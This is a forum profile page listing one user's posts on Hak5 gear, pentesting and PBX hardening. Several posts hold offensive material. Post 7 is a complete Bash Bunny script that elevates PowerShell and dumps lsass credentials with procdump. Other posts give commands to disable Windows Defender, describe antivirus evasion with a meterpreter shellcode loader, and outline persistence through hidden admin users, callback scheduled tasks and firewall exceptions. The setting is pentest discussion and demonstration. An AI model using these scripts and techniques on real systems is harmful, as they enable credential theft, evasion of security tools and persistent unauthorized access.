Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

  • Days Won


Everything posted by rottingsun

  1. There's a few basic strategies, some hardware based and some software based. Normally a special type of firewall called a session border controller is placed in front of the PBX. They're designed to address issues like toll fraud. Other things can be done too though. General PBX hardening best practices should be enforced, like strong SIP account passwords, limiting SIP sessions to only your authorized private subnets, not allowing outgoing international calling, not allowing outgoing calling to offshore US territories, turning off call transfer feature codes for incoming calls, not exposing your PBX directly to a public IP, etc. On top of that, you must monitor logs regularly. Here's a presentation that's FreePBX based but includes general best practices. https://player.vimeo.com/video/130328541
  2. With mimikatz and all the derivatives being flagged more and more these days, I find it more effective to take a memdump of lsass using procdump, then running it through mimi in minidump mode.
  3. So I ended up having a major issue with a VMware host at work and missed the live. Anyone care to share their impressions of the PS?
  4. Just a few more hours until the new eagles land.
  5. Any further details on the device and what it is capable of, or do we have to wait until tomorrow?
  6. Oughta been interesting. I'll be watching the live stream intently. This blog refers to it as a "programmable MITM device". https://www.doyler.net/security-not-included/def-con-25-bsideslv-2017 I also saw someone on Twitter describe it as "an online tap with payload capability, like the bash bunny".
  7. Here's my working code for running an executable (procdump) from the bunny within powershell and the saving the dump file to the bunny, given the user has local admin privs to begin with. Note that in the line that runs procdump, the & character occurs at the front of the command. It is a special powershell operator that evaluates the text following the & character as a command and not a powershell object. LED Y 100 source bunny_helpers.sh LED B 100 ATTACKMODE HID STORAGE Q GUI r Q DELAY 500 Q STRING powershell Start-Process powershell -Verb runAs Q ENTER Q DELAY 1000 Q ALT y Q DELAY 500 Q STRING \$bunny\=\(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\) Q DELAY 500 Q ENTER Q DELAY 500 Q STRING \& \$bunny\\payloads\\$SWITCH_POSITION\\Procdump\\procdump.exe -accepteula -ma lsass.exe \$bunny\\loot\\takeadump\\lsd.dmp Q ENTER Q DELAY 200 Q STRING \$driveEject\=New-Object -comObject Shell.Application Q ENTER Q DELAY 200 Q STRING \$driveEject.Namespace\(17\).ParseName\(\$bunny\).InvokeVerb\(\"Eject\"\) Q ENTER Q DELAY 200 Q STRING exit Q ENTER LED FINISH
  8. Perhaps LLMNR, NETBIOS, and WPAD are all disabled on the target? Far fetched of it's a home PC i know but.
  9. Nice. I got mine in recently. My first payload was running procdump from the bunny and then saving the dump file onto the bunny for later mimikatz analysis.
  10. A technique I've been experimenting with that gets past both Win Defender and Vipre AV currently is a custom shellcode loader, as per http://www.attactics.org/2016/03/bypassing-antivirus-with-10-lines-of.html. I've used the loader almost verbatim with a shikata_na_gai meterpreter rev_tcp payload to successfully bypass both.
  11. The latest Empire stagers actually have a bunny target.
  12. Very nice. I actually never thought of the bunny/ducky in the context of legitimate uses. I got a bunny personally so I can demo to management what happens if I grant a non-IT user local admin perms like I sometimes get asked.
  13. I believe RDP locks the session of the currently logged in user, which would be a dead give away. Would this payload be more in the context of a sneak attack while a user is away? Not knocking it - just wondering the intent.
  14. KeePass is really awesome. Just make sure an attacker using Empire doesn't get a shell on your system. It includes a module called KeeThief which can display your master password in cleartext.
  15. I ordered a bunny late last night. Looking forward to trying out this payload and maybe adding in the concepts I mentioned.
  16. I would but I don't wanna be hungover for work tomorrow.
  17. Right, but this payload actually does assume that the machine being attacked is already logged in with admin rights as per the description - #OS: Windows (Requires Powershell and Admin Rights) This would be a great payload for the case of a target running say Windows 10 Home as the default user that also happens to be part of the Local Admins group. It's safe to assume that probably alot of home users run Windows like that. On the other hand, this payload should NEVER work in a corporate/AD environment if even the most basic security practices are being followed. I am sure we'd all be shocked though at the number of AD setups where every user is a local admin, and god forbid, a domain admin.
  18. Anything can be done with a little ingenuity and local admin privs, which this payload does assume that the logged in user has. I have several ideas that could enhance this already good payload, including: - The one I previously posted about. That is, making the new user invisible to the Windows logon screen. - Creating an elevated scheduled task (Run with Highest Privileges option) with the new user creds. The task executes a meterpreter payload to connect back to the attacking machine after 1 minute, 5 minutes, whatever. The meterpreter session created from the scheduled task returns with UAC already bypassed, allowing for a simple getsystem command to elevate within meterpreter. EDIT: Actually it looks like meterpreter shell already does this the way it's implemented here. - Using Set-MpPreference to disable Windows Defender, although this is a bit "noisy" since it displays a tray popup. An alternative would be to use Set-MpPreference to set a folder exception for Windows Defender before copying any binaries that might otherwise be flagged from the bunny to the exception folder. - Use powershell to add a Windows Firewall exception to allow all incoming traffic from your attacking IP. The possibilities are endless. I guess I just need to break down and order a bunny.
  19. Very nice payload. It'd be sweet to go even a step further and hide the new user from the Windows login screen with reg commands, as per the technique outlined in this post: http://www.windowscentral.com/how-hide-specific-user-accounts-sign-screen-windows-10
  20. Here is what I always used for enumerating the duck by the label DUCKY - for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duckydrive=%d Then the ducky can actually be referenced by letter with the env var %duckydrive%.
  21. Most likely, but I have found the python/meterpreter/rev_tcp with pyherion encrypter to still be pretty reliable as far as AV evasion. As far as the new Defender API, as long as local admin perms are present on the target, you can use Set-MpPreference (Set-MpPreference -DisableRealtimeMonitoring $true for example) to turn off the various features of Defender. This is a bit "noisy", since a notification pops up immediately in the tray, but you could always quickly disable Defender, run mimikatz or some other payload, then re-enable Defender in the cleanup. I'm actually contemplating getting a bunny just for a payload similar to that. Start off in RO mode and disable Defender, loop with Get-MpPreference | fl DisableRealtimeMonitoring until the value becomes True, switch to RW mode and execute a payload, exfil to storage if necessary, switch back to RO mode, re-enable Defender.
  22. This. If your company can afford one, you will be blown away vs all others.
  23. Yes you can, but depending on the systems, it can be somewhat of a major pain in the ass to get it working just right.
  24. Actually interested to see if Hak5 has any thoughts on the situation (good, bad, or indifferent)? Seems like the entire deal was a bit bizarre.
  25. It was my understanding that pineap did work in that manner - that is, broadcast out SSIDs based on client probes. I could easily have gotten that wrong though. The audio on the talk was pretty bad. We may just have to wait for a tech doc or a follow up hangout.
  • Create New...